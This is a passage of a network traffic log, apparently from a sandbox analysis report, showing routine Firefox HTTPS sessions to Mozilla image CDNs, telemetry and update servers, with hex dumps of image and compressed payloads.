2024-07-26 18:11:02 UTC	382	IN	Data Raw: 32 42 11 13 14 20 33 52 05 23 24 43 72 ff da 00 08 01 03 01 01 3f 00 90 dc 4a 4c 3d ba 8c 23 48 ff 00 42 52 66 a7 ec b2 8c 6b a8 ac a7 91 b9 5a 36 fe b1 16 23 30 ab 21 96 23 71 17 88 d1 45 93 09 fa 8f aa 84 55 26 7c ca 75 1b f0 15 64 c3 28 ab d4 6a 11 59 31 11 96 c9 af 95 b4 bf 6e 22 0a b3 c9 8a f8 71 15 86 6c 49 45 50 af 93 44 59 2b 19 2b 44 4a fe aa 7e c6 e8 6e 37 eb ea 94 33 73 6d b9 66 e5 cc ab 5e ab f1 29 b4 96 e9 18 da 38 88 b1 11 62 ae 57 94 69 b0 a9 d8 7d 15 31 35 59 0d b6 a6 db 47 a8 dc d2 dc 8d c6 da 9f 84 d1 7a 10 f9 7b 98 d3 21 52 96 e2 3d cd 85 2a 6e d5 34 a8 27 1b e8 d6 4f b6 e2 ac 9b 11 de aa e2 a2 3b 46 35 08 e3 89 05 94 89 28 ee de a7 a6 bd c5 56 22 d2 1e 6f 4d d7 5e e6 d7 f8 d4 e2 b4 f3 2a a5 7f 6f b1 8d 8b b7 c7 ac ec 2a 75 23 12 2c 46 Data Ascii: 2B 3R#$Cr?JL=#HBRfkZ6#0!#qEU&\|ud(jY1n"qlIEPDY++DJ~n73smf^)8bWi}15YGz{!R=n4'O;F5(V"oM^o*u#,F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	64204	34.36.165.17	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	424	OUT	GET /m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.10862.jpg HTTP/1.1 Host: tiles-cdn.prod.ads.prod.webservices.mozgcp.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site
2024-07-26 18:11:02 UTC	664	IN	HTTP/1.1 200 OK x-goog-generation: 1710789830520587 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 10862 x-goog-hash: crc32c=ugLQ9w== x-goog-hash: md5=08ZP0PlRAtR8vaAEbzQ0dw== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 10862 X-GUploader-UploadID: AHxI1nOnXfIyfeni46bg8X6VYj0CX2cGppzz7PDOsMt3KbY7bDwOTqhXIRL-Mop_dlN8gHsW0B4 Server: UploadServer Date: Fri, 26 Jul 2024 17:58:11 GMT Age: 770 Last-Modified: Mon, 18 Mar 2024 19:23:50 GMT ETag: "d3c64fd0f95102d47cbda0046f343477" Content-Type: image/jpeg Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	726	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 02 01 01 02 01 01 01 02 02 02 02 02 02 02 02 02 01 02 02 02 02 02 02 02 02 02 02 ff db 00 43 01 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 ff c0 00 11 08 00 c8 00 c8 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 03 0a 08 09 01 02 0b 07 06 04 ff c4 00 52 10 00 00 05 03 01 01 06 10 0a 07 05 09 00 00 00 00 00 01 02 03 04 05 06 07 08 11 09 0a 12 13 1a 21 31 33 36 42 51 53 58 73 77 Data Ascii: JFIFCCR!136BQSXsw
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: aa 95 0f 0d 4f 7a 83 59 97 e4 f8 7c e3 8f 77 b6 bd e7 54 1d 54 a8 78 6a 7b d4 1a cc bf 27 c3 e7 04 fb c5 d0 79 ff 00 3c b0 ea a5 43 c3 53 de a0 d6 65 f9 3e 1f 39 09 a8 cc cc cd 46 a3 33 e7 33 33 33 33 f9 94 64 7b 4c cc cb f6 fc c3 14 78 d1 e3 67 52 f6 b5 11 30 4c c0 71 ca 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ca 92 64 6a 49 f4 52 66 93 db cc ae 11 19 91 f3 7e f2 19 a2 c2 58 31 b6 73 18 a1 ae 75 e0 38 18 4c a0 00 00 00 00 06 aa f7 40 77 5c 74 e5 a0 1a ad 22 c4 b8 e9 b5 fc b1 98 ea f1 1a aa 3d 8b ac 29 f4 Data Ascii: OzY\|wTTxj{'y<CSe>9F33333d{LxgR0LqdjIRf~X1su8L@w\t"=)
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 5a 3d b1 b3 b2 7d 4b a7 5e 14 93 e6 5f b1 83 1b 52 91 76 54 eb d1 1b 92 d6 b6 6e 0a ca b5 89 df 62 a4 b8 b9 ab 4b 31 58 a3 3a 97 3e b9 4e a6 f1 97 47 e9 16 00 1a d5 47 2b 93 2f be c5 7f 79 ed 00 50 00 07 29 e8 97 ef 2f ea 33 c1 ed c9 ce a0 95 ee 9e f7 7c 77 d6 50 cb 53 df f3 9e 9a 0e 3c 0d e0 de 6f a4 84 70 cc ac cc bc e0 0b c0 03 4a db ac bb ac b6 b6 85 ed 59 38 af 15 c8 a3 5d fa ab bb e8 ca 5d 22 8e e2 9a a8 d1 f1 25 1e a2 c2 93 16 fb be 62 a0 cc 9c a9 9a 15 c3 a4 52 17 b1 52 d6 92 93 24 93 05 29 f8 4c ff 00 d4 5f a8 be b1 7f 15 89 3b 67 6a a5 5f 43 ba fa 0b bf b1 84 e4 db d4 1f c3 0e 13 b8 65 5c ed db f8 a7 93 5e 35 e2 49 d9 b9 3e a7 d3 f0 89 5f 8a 9b 46 6c 3b a5 b2 b3 3d fe c5 73 fb 2e 62 87 97 8d e1 75 e4 3b ae e2 be af ab 8e af 77 5e 77 75 5e 65 7a Data Ascii: Z=}K^_RvTnbK1X:>NGG+/yP)/3\|wPS<opJY8]]"%bRR$)L_;gj_Ce\^5I>_Fl;=s.bu;w^wu^ez
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 34 da 0d 46 3b 5d 84 b0 76 9e f2 ed 4d 06 c6 58 da 0b eb 75 5a d4 4c 84 64 26 e5 3e 61 eb b9 8f 30 de 09 06 6e 5e f3 f2 aa 95 39 0a 44 a4 e5 52 a7 38 d8 74 f6 b7 3e 6c 0f 3f 9d d3 6d d3 6c 93 ba 0f 92 50 d3 29 a9 59 5a 7a b2 2a 6f b9 8b 71 73 8f 12 1e 7d f4 13 ec 26 fc bf 0a 3b aa 6e a7 7a 4a 8c a5 71 6d 12 96 c5 26 3b aa 8b 15 46 b5 49 92 ff 00 d2 ae a4 bd 49 96 7f 53 75 98 74 c4 c6 4d 62 f4 6b 0d 46 56 ab 2c 6b 5d 0b 5a 76 4f e0 d2 cb 93 b5 93 66 e1 5e cc 9d ce 2e 21 b5 ba b7 33 16 b6 69 cb da e8 09 bc e4 f3 3a 33 bb e7 69 c7 f5 9a be 13 1d 72 71 d8 cc 74 1f d9 c8 e4 d0 05 a5 00 00 00 00 2d 43 bd 81 ea cb 58 5f 55 31 07 df 17 a0 d3 97 45 b7 b8 77 45 e3 33 9f 37 2c 48 5b 88 ee 85 a1 f6 a9 3f 89 e5 bb c6 91 09 36 00 00 01 1d 6f 8b ec 19 e0 f6 e4 e7 50 4c Data Ascii: 4F;]vMXuZLd&>a0n^9DR8t>l?mlP)YZz*oqs}&;nzJqm&;FIISutMbkFV,k]ZvOf^.!3i:3irqt-CX_U1EwE37,H[?6oPL
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 49 e6 b6 9c d6 ec ae e7 27 03 cf e3 74 d3 74 d3 24 ee 82 e4 84 b2 da 6a 56 56 9e 6c 9a 9b ce 62 ec 5c b7 89 2f 3c fa 49 d8 c9 bf af c2 8e e2 9a a9 5e d2 a2 b8 ae 2d b2 52 d8 a4 c7 78 e2 45 51 ad 52 24 c8 fa 53 d4 97 a9 2e cb ea 6c b3 0e 98 98 c9 ac 5e 85 61 1a ca d5 69 8d 6b a1 6b 4b 87 e0 d2 da 24 d9 b8 7b d9 93 b9 db 10 de dd db b9 9b 5d 50 c3 2b 22 81 0f 62 4e 4f 72 f8 ce e5 d3 95 de ed 8d 5f 89 91 b0 9b 09 86 4e 19 3b 1b 9c 9f aa 74 0c 57 6a bb 95 6f f2 fd 50 2c 28 00 19 9d a1 9d 0c 66 2d 7a e6 28 58 c3 18 43 3a 55 bd 4a 38 b5 1c 99 93 2a 51 56 ed b1 8e 2d 87 5d 52 55 50 9e b2 52 4a a1 5e 92 4d 38 dd 32 98 da f8 e9 af 70 ba 53 0d bd 21 98 fd aa 2b 54 5d 8e d4 ed 63 66 2d 1d a3 98 58 d5 68 db 5a 35 15 3b 65 4e 37 e4 60 e9 96 73 b7 6f e0 c4 ed 76 46 c9 Data Ascii: I'tt$jVVlb\/<I^-RxEQR$S.l^aikkK${]P+"bNOr_N;tWjoP,(f-z(XC:UJ8*QV-]RUPRJ^M82pS!+T]cf-XhZ5;eN7`sovF
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 9a 04 3d e7 2b c3 19 79 7b ec af da dd 69 35 7a 26 32 60 89 83 55 15 b8 64 ed 73 61 f5 4e 83 de 2a b7 25 5b f0 01 69 40 00 cc fd 0b e8 63 31 6b d7 31 44 c5 f8 be 21 d2 ad ea 59 c5 a8 64 dc 9b 50 88 eb b6 ce 37 b6 5e 70 c9 75 09 eb 25 25 35 1a f4 84 36 e2 29 94 c6 d7 c7 4d 7d 3f f2 e3 b4 fc 86 e3 f6 a8 bd 51 76 3b 53 ad 8e 99 b4 76 8e 61 63 55 a3 6d 68 94 66 f6 ea a4 6f c8 c1 e3 3a 59 ce dd bf 83 28 ed 76 46 c9 54 2d 55 45 24 a4 9b ae 43 89 bf 67 38 21 a7 03 5b ec 91 0f 42 ed 28 e9 47 0d e8 d3 0e d0 70 b6 15 a0 a6 95 41 a5 25 b9 b5 fa f4 d4 30 f5 d1 7d dd 2e b2 db 75 2b c2 f0 a9 36 da 4e a1 59 92 6d ec 4a 48 89 88 8c 21 11 62 21 a8 ed 92 47 cc bd f3 5f 65 ba bf 5b 73 55 b6 f6 e2 a8 91 a2 46 47 36 5a 59 ae 76 45 11 9c 59 09 06 ee 5d 05 78 ef dd 65 65 6c 93 Data Ascii: =+y{i5z&2`UdsaN*%[i@c1k1D!YdP7^pu%%56)M}?Qv;SvacUmhfo:Y(vFT-UE$Cg8![B(GpA%0}.u+6NYmJH!b!G_e[sUFG6ZYvEY]xeel
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: d0 71 e0 6f 06 f3 7d 24 23 86 65 66 65 e7 00 5e 00 00 00 00 00 00 14 18 dd 57 d1 1e ae 67 6b f7 52 b7 95 bd a7 4c bb 79 59 f9 1a fe 72 f7 b3 2e bb 1a c6 af dd d6 f5 6a 83 55 a4 d2 92 da 99 a9 50 61 3e db 13 59 93 1e 43 32 23 ba 68 79 97 19 34 9a 38 26 4a 3f a5 0d 47 17 f5 73 90 35 38 5d ad 1a a3 6f 28 d4 0b 41 66 68 cc 93 a8 c9 cf 54 19 27 3b d3 52 d3 11 5e cc 19 38 e4 ce c5 67 27 ec 90 c6 f0 2c a5 76 2d a6 b4 13 50 29 33 b5 29 0a 94 d4 26 ed 19 9b 6a dd 86 bb 47 03 4d 78 ff 00 b9 46 b2 7b 94 35 17 e8 76 fb f7 28 93 7f f8 83 b9 85 d9 5b d4 a1 e2 ef fa e9 1f ae 74 d5 b2 95 f4 5c 12 ce ce e0 df fa 17 99 21 a5 ed c9 bd 69 ea 57 2a 50 6c 49 58 5f 22 61 cb 41 e9 68 76 f3 ca 99 46 ca ad da d6 d5 9f 40 6d 44 b9 93 63 b5 5b 62 33 97 15 71 6d 24 9b 87 4e 8a 4a 71 Data Ascii: qo}$#efe^WgkRLyYr.jUPa>YC2#hy48&J?Gs58]o(AfhT';R^8g',v-P)3)&jGMxF{5v([t\!iW*PlIX_"aAhvF@mDc[b3qm$NJq
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 9f 9c 4a 6d 3a 9a 88 e5 73 8b da c8 af 8b ac 40 4c a2 f6 9b 85 fb 9f 19 17 46 d8 6a f7 c9 79 a9 87 28 59 53 50 89 b4 a7 2b 1e 3c 92 4c ec 7d 63 db 8c 54 e4 50 a9 d7 2a c8 cc 91 77 4c 95 59 91 2a 64 64 99 94 16 92 c4 67 4f e1 3f 08 42 3e 75 ba 21 da a5 ac d5 f6 db cb 3f 65 2c 94 4e 98 a2 dd cc 69 c8 09 52 6e e2 7e af 3e d6 c2 8c f8 5c 0e 91 80 d9 6c 97 bb 8a b9 4a 4b 6b a2 b1 b3 76 6e 42 7a a3 52 da ce d5 51 b8 27 b1 c3 60 de b8 d7 5e 4a a6 c3 b0 ca 6e 7c 9d cf ec 9e ca cd ca 01 69 70 00 11 d6 f8 be c1 9e 0f 6e 4e 75 04 cf 74 f7 bb e3 be b2 86 5a 9e ff 00 9c f4 d0 71 e0 6f 06 f3 7d 24 23 86 65 66 65 e7 00 5e 00 15 77 df 3d 7c 94 e8 ff 00 c2 76 50 fc 21 6f 8d c0 74 23 bf c6 57 bd e2 b2 7f 2e 60 8f 77 f5 dc fa 27 b6 4e 7c 82 9e e3 79 04 62 6e 64 e6 00 54 de Data Ascii: Jm:s@LFjy(YSP+<L}cTPwLYddgO?B>u!?e,NiRn~>\lJKkvnBzRQ'`^Jn\|ipnNutZqo}$#efe^w=\|vP!ot#W.`w'N\|ybndT
2024-07-26 18:11:02 UTC	406	IN	Data Raw: 54 c9 09 49 71 f1 8d a7 7f 46 5f 1f e2 90 fd da 2d aa b5 16 7e 0d 5a 42 81 5c a8 51 65 2b d0 f5 aa a3 d8 e7 b1 93 b0 7f 26 d6 b1 cd 6a b3 73 b1 b9 d8 38 53 12 12 b3 59 31 e6 61 35 d9 38 e1 94 d4 5d a9 fa 9e 8f 39 f3 9f 67 a2 7f c4 fa 26 3f 13 63 6c 89 99 db 1f b3 de af d5 39 58 27 06 c6 52 01 69 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 7e b8 fe f9 4a 6c 6e 79 00 b0 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 1b 36 6c e6 33 3e 87 31 19 9f 67 c8 33 43 87 1a 3a e0 8c c0 1d b6 1f 60 fc 86 2b ac c6 e5 29 8a 69 41 b0 fb 07 e4 30 d6 63 72 8c 53 4a 0d 87 d8 3f 21 86 b3 1b 94 62 9a 50 6c 3e c1 f9 0c 35 98 dc a3 14 d2 83 61 f6 0f Data Ascii: TIqF_-~ZB\Qe+&js8SY1a58]9g&?cl9X'Rix~Jlny6l3>1g3C:`+)iA0crSJ?!bPl>5a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	64206	34.120.237.76	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	543	OUT	GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb1da8a8e-07d7-4788-a750-b444d5b94049.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site
2024-07-26 18:11:02 UTC	1100	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 5565 x-amzn-RequestId: 2faac534-e5ad-4f55-a049-6330608f2144 X-XSS-Protection: 1; mode=block Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Frame-Options: DENY Content-Security-Policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: aZJ21HhHIAMEipw= X-Content-Type-Options: nosniff X-Amzn-Trace-Id: Root=1-6686bcf8-58885876662be6355da12a7d;Parent=50779cf80fc1f379;Sampled=0;lineage=69363f46:0 x-amzn-Remapped-Date: Thu, 04 Jul 2024 15:17:12 GMT X-Amz-Cf-Pop: SEA900-P2 X-Cache: Hit from cloudfront X-Amz-Cf-Id: gUgqAfuNz5kOSbWajdVhFZ7HUudgtOrJgTn_RZ9wHY8aNIGoJNXxnQ== Via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 4759de193c7dcd4b2027bf84cdc1f180.cloudfront.net (CloudFront), 1.1 google Date: Fri, 26 Jul 2024 07:05:08 GMT Age: 39953 ETag: "61fd0bd32a3218efc1315805a4a66d5bf011e76f" Content-Type: image/jpeg Cache-Control: max-age=3600,public,public Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	290	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 00 94 01 28 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 ff da 00 08 01 01 00 00 00 00 e0 02 80 00 03 4d da 5d a5 c7 1a 2c 5e a7 31 90 8a 00 00 02 41 40 00 06 bf b0 5f e6 73 15 2c 6a b2 17 fd 07 8c 66 6b 40 00 00 4a Data Ascii: JFIF++&.%#%.&D5//5DNB>BN_UU_wqw++&.%#%.&D5//5DNB>BN_UU_wqw("M],^1A@_s,jfk@J
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: c2 d9 f6 0e 57 57 9a a0 00 00 12 a0 00 37 9d 46 16 bf 05 7b 8b 6a 54 59 76 38 bb 5b 2e 8b c7 1a a3 cc 80 00 25 40 01 bb ea 55 5b 1c da 17 8e 71 68 f5 50 e1 cb e8 2f 72 47 e9 f3 09 00 04 a8 00 e8 1d 36 a2 fa cf 17 61 4f 5a 78 e0 87 71 53 b4 3d 67 9f 61 26 54 66 10 00 25 40 1b ee 95 06 3e f7 1a 89 39 a8 b6 31 e4 47 79 34 99 59 dd 13 43 c9 d4 ba fc c3 40 09 50 1b ce 89 1e 3b ba cc 74 b6 ea 1e ad ca 1a 8b a8 e8 e6 4f bd db 79 c4 27 9a 83 9a 60 04 a8 37 fb b6 10 ed 84 04 58 51 46 c6 d7 f4 5c 8d 3b db 3b 5c 25 49 7b 6b 23 3f 25 98 94 31 01 2f dc 6a 35 09 f1 72 98 4d 8c 8c 5d 76 0f 49 36 92 0b 77 fb ac ee 61 28 b4 d1 52 a5 f8 b3 8a 5a fd 5d a3 e4 f1 e9 68 66 54 88 14 7e 62 6c 62 c8 6a 36 8a f9 ac 1a 12 5e 59 56 b0 fd eb 4c b4 eb ce ae 4b d2 d1 e4 85 ca cf 45 d6 Data Ascii: WW7F{jTYv8[.%@U[qhP/rG6aOZxqS=ga&Tf%@>91Gy4YC@P;tOy'`7XQF\;;\%I{k#?%1/j5rM]vI6wa(RZ]hfT~blbj6^YVLKE
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 0c f3 45 2c 72 74 58 21 8f a9 13 cf 14 90 94 11 ef 6a 48 21 82 47 ca 3b 03 50 49 1b 7a 07 74 1d 5f 51 37 ad a1 2d a4 0e 3a 86 18 8d d4 f3 93 a7 65 ee b6 aa c7 6e 3f 33 45 24 2e 51 ff 00 8b d3 5e 9a 13 74 bd 7d e5 e4 f5 0f 27 3e 03 13 f8 9a a3 c5 ec a3 6f ad 8a d5 45 48 a2 8f ce 2f 24 f5 8f 66 04 34 dc b2 46 7d a0 c1 7b f1 c6 5d da 51 a4 08 96 d6 cb 69 b4 05 21 d7 4f ba d5 17 fb 6a bb fd 7d a6 11 5a 78 7a f4 38 57 c6 59 ac 6e 53 9a be 7b 72 21 e1 48 f0 32 09 a6 ad 3c 36 2b df d8 45 bd f4 5d ab 91 ad 21 25 03 65 5e 37 40 1c c4 53 8f 33 47 d7 f7 ad aa f1 ce 9c 34 f5 e4 81 ca bf f0 68 3d 34 a3 a5 cb ed 31 3e 49 6e 06 31 00 0c 86 23 34 90 c6 b6 26 88 ec de c1 b1 3c 96 ec 49 62 48 c1 9b 92 90 46 11 78 1b 59 bb df 08 2e 5b 82 b2 3d ab 3b 0f 51 d9 b3 ca 57 d4 6b Data Ascii: E,rtX!jH!G;PIzt_Q7-:en?3E$.Q^t}'>oEH/$f4F}{]Qi!Oj}Zxz8WYnS{r!H2<6+E]!%e^7@S3G4h=41>In1#4&<IbHFxY.[=;QWk
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 00 fc 53 e4 b6 64 34 99 34 fc 86 a6 36 6b 28 be 88 c4 f1 73 f5 89 96 98 0a cd b3 82 f0 ed 8a 02 e6 c5 06 41 71 8c a0 d1 e4 cc 59 83 dd 8f f4 67 27 95 94 7a 93 45 a1 f6 8b b6 99 0e cd 2f ea 22 68 2e 37 67 ec 93 1a f5 75 c6 c3 e8 d8 ad 62 53 4b 75 c9 96 8e 87 ed 02 e3 d1 6c 8f ed 56 a5 6c 48 db f3 33 63 ea 24 49 59 6a a2 88 80 5c a3 d6 6f 9d 60 0a 81 45 ae 2e fd 6f 9c 12 d3 1b 79 89 c6 ad 17 d8 f3 60 6a 7f f6 37 90 1a 57 52 b8 9f fb 94 4b 3f 03 00 db d9 26 36 cc d5 fc b6 de 4f 1a 88 b9 67 0f 1f fd 83 4d 8b 6c 36 36 90 05 c8 fe bf d7 b2 a2 2c ff 00 9a 95 bd 25 ab d2 19 a5 74 68 94 69 5a 15 37 15 2b f2 2b 06 d4 b3 d1 7a 7c f8 fe d1 6a 5e c2 86 f2 2e 33 4f a8 9f 53 08 b2 e5 4a 4b 2a 8a 2e 1a 01 03 cf 4c bd 89 c8 69 06 b2 25 5d 2f 89 d6 32 0c df 6f 18 e9 20 a8 Data Ascii: Sd446k(sAqYg'zE/"h.7gubSKulVlH3c$IYj\o`E.oy`j7WRK?&6OgMl66,%thiZ7++z\|j^.3OSJK*.Li%]/2o
2024-07-26 18:11:02 UTC	1105	IN	Data Raw: bb d4 ed 68 e9 ca 9c c0 1d 47 4a 9e 30 48 18 76 18 b9 85 dd f1 d1 f9 40 a8 e3 00 95 18 f0 e6 a3 39 d1 45 60 2c a1 d6 37 fc 04 37 96 9a bd 0a 8a 20 3a d3 38 31 80 f1 e4 5a 50 e3 04 82 b9 88 15 27 01 a9 c8 41 b7 d5 c1 3e 19 f7 c6 31 d1 40 cc 7d d8 e9 b3 d4 f6 b1 b4 63 3d ab fd 9c 86 85 f6 6b 1f c6 1b e9 04 9a 73 3f 3a 9e 06 3d 4c e2 ef 26 70 1a 36 3c 97 8e 30 c4 2e 9a 41 a9 ce 2e 62 7c a2 fc 2f 1e 11 9e 3c 7a d1 7b a8 a1 e2 20 d4 d2 e3 a8 8c 23 00 2c 81 91 89 36 58 9c 65 9a 78 61 0f 51 a3 0f f8 c4 92 c3 55 35 8d 9c 31 d5 cd 60 28 1a 01 77 36 95 63 4a b1 a0 1d 66 39 08 9c b3 6c 9a 17 41 71 39 d9 e4 5d e3 e9 1b cf 2e 33 4d 4f 62 ff 00 58 cc c4 df 26 43 f9 45 6c 6f a5 9d e1 12 4c d0 4d 03 4a f3 80 fe 9c 3b e0 a4 a6 a5 d2 98 ef 91 d6 d3 be 36 59 81 c7 48 b0 a0 Data Ascii: hGJ0Hv@9E`,77 :81ZP'A>1@}c=ks?:=L&p6<0.A.b\|/<z{ #,6XexaQU51`(w6cJf9lAq9].3MObX&CEloLMJ;6YH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	64212	34.120.208.123	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	628	OUT	POST /submit/firefox-desktop/messaging-system/1/ae04dde8-69a1-49f8-95f1-d533ed587ff6 HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-type: application/json; charset=utf-8 content-encoding: gzip content-length: 605 date: Fri, 26 Jul 2024 19:27:29 GMT x-telemetry-agent: Glean/53.2.0 (Rust on Windows) Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: none Pragma: no-cache Cache-Control: no-cache
2024-07-26 18:11:01 UTC	605	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 85 93 5d 6f db 20 14 86 ff 0b b7 2d 19 e0 6f df f5 a2 9a 76 b1 4d 6a 3a ed a6 12 e2 e3 38 41 b3 b1 07 b8 69 54 f5 bf 0f 9c 2c ad 94 2c 93 2c cb 3a bc bc e7 31 bc e7 15 4d c6 6e b8 b1 dd 88 da 57 e4 e1 37 6a ab 5b e4 83 70 81 07 33 00 6a 11 23 2c c3 94 60 92 3f d2 bc cd c9 0d a1 2d 21 e8 16 81 d5 ff d7 bc 4c e0 a2 c6 06 9f 1a 28 ff 8c cd 30 8d 2e 60 07 3d 08 0f d8 8d 7d 3f ce 21 ad 4a 27 ac da 46 3b b0 42 f6 80 df d5 8b 53 70 22 a9 c0 a6 2d c9 f2 8b 8e da 4c 8a 32 6f a4 c2 12 f2 0a e7 b2 61 b8 ae 4a 86 19 55 42 16 95 d4 22 93 71 7b d8 4f 09 d4 9a 41 ce fe d4 f4 ed ed 16 cd d3 c6 09 0d d8 4f 63 e8 cd 66 1b 2e 22 05 07 22 a4 a6 d7 50 00 14 ad 3b 81 19 29 23 0a a9 19 6e 58 01 b8 51 b5 a8 58 4e 69 5e 5f 47 f1 e0 26 2c 34 0e f1 6c Data Ascii: ]o -ovMj:8AiT,,,:1MnW7j[p3j#,`?-!L(0.`=}?!J'F;BSp"-L2oaJUB"q{OAOcf.""P;)#nXQXNi^_G&,4l
2024-07-26 18:11:02 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:11:02 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	64217	35.244.181.201	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:02 UTC	437	OUT	GET /update/3/SystemAddons/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1 Host: aus5.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
